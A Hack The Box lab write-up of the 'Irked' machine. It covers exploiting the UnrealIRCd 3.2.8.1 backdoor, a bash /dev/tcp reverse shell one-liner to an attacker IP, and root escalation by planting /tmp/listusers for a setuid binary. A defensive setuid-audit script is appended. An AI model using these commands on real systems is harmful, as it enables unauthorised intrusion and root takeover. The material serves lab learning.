
Hack The Box — Irked Writeup without Metasploit

Irked is based on ircd. It was fun while it lasted, but it took me a lot of time to solve. We will start with nmap, as always.

First I checked port 80.

IRC is almost working. That’s the first clue right there. We will try another method to confirm this.

Time to attack IRC. After searching and going through some exploits, I found something that really worked.

https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor is the perfect exploit. He actually rewrote the whole thing in Python, and he has done a great job. I downloaded the script and edited it.

You have to provide your IP address. I made a mistake while editing that gave me a lot of trouble. My actual IP was 10.10.14.4, but I wrote 3 there and it didn’t work properly. After a while I checked it again and changed it. I make mistakes, and yes, I make a lot of mistakes.

We need to make sure netcat is listening on port 4444, then run the script:

python3 exploit.py -payload netcat 10.10.10.117 6697

And this happens: I do not have permission to view the file. Now I’m mad. After countless hours of waiting, this is what happens. I needed a better shell, so I forwarded the shell:

bash -i >& /dev/tcp/10.10.14.4/4443 0>&1

Now we have a better shell. At least that’s what I think.

OK, I missed one screenshot, which actually shows that there was a .backup file which said something about steg.

I guess that means there was something hidden in that stupid-looking picture on the website. But right now I’m not bothered about it, since I have a shell. Maybe this is the long way and that might have been a shortcut. You’re more than welcome to try it, but I won’t try it.

I was poking around hoping that I might find something, and I did. How lucky can I be?

And we all know /usr/bin/viewuser is not something normal. Let’s continue to explore the wonders of viewuser.

First thing: the file in the tmp folder is missing. Good for us. I missed another screenshot, which shows that the file executes with root privileges. Better luck next time. So we create a file called listusers and use a one-liner shell script to call for a root shell. It’s purely evil.

echo '/bin/bash' > /tmp/listusers

Now we give execute rights to everyone.

Time to call the script.

And there you have it. It’s all done.
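A defender-side check for the weakness used above, as an added example that is not part of the original writeup: it lists setuid/setgid executables that embed hard-coded paths under world-writable directories, the pattern viewuser shows with /tmp/listusers. The directory lists and function names are assumptions of this example, as is the premise that the path is stored in the binary as a plain string.

```python
import os
import re
import stat

# World-writable directories (assumed list for this example). A path under one
# of these can be created or replaced by any local user.
_RISKY = re.compile(rb"(?<![\w.\-/])(?:/tmp|/var/tmp|/dev/shm)/[\w.\-][\w.\-/]*")

# Directories to scan for privileged executables (assumed defaults).
DEFAULT_ROOTS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin")


def risky_paths(blob: bytes) -> list:
    """Return hard-coded paths under world-writable directories found in blob."""
    return sorted({m.decode() for m in _RISKY.findall(blob)})


def is_privileged(mode: int) -> bool:
    """True for a regular, executable file carrying the setuid or setgid bit."""
    special = mode & (stat.S_ISUID | stat.S_ISGID)
    return stat.S_ISREG(mode) and bool(special) and bool(mode & 0o111)


def audit(roots=DEFAULT_ROOTS) -> dict:
    """Map each setuid/setgid executable under roots to the risky paths it embeds."""
    findings = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                full = os.path.join(dirpath, name)
                try:
                    if not is_privileged(os.lstat(full).st_mode):
                        continue
                    with open(full, "rb") as fh:
                        hits = risky_paths(fh.read())
                except OSError:
                    continue  # unreadable or vanished file: skip it
                if hits:
                    findings[full] = hits
    return findings


if __name__ == "__main__":
    # Constructed sample bytes standing in for a binary like viewuser.
    sample = b"\x7fELF\x00(users)\x00/tmp/listusers\x00/usr/tmp/x\x00"
    print("sample:", risky_paths(sample))
    for binary, paths in audit().items():
        print(f"{binary}: {', '.join(paths)}")
```

A hit is a lead to review, not a verdict: confirm how the binary uses the path before changing its permissions or removing it.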
